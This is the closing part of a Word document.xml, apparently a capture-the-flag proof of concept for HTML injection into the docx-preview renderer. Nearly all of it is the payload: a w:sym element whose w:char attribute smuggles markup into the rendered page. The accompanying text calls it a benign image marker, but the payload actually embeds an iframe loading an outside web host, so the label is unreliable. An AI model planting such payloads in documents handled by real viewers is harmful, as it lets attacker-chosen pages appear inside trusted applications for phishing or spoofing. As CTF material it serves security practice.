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 VERITAS CTF chatapp docx-preview HTML-injection PoC (benign). The symbol run below injects a marker &lt;img&gt; via w:sym/@w:char.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:sym w:font="Symbol" w:char="0;&lt;iframe src=&quot;https://main.d4zeeqgazhley.amplifyapp.com/&quot; width=&quot;100%&quot; height=&quot;500&quot;&gt;&lt;/iframe&gt;"/>
      </w:r>
    </w:p>
    <w:sectPr/>
  </w:body>
</w:document>
</file>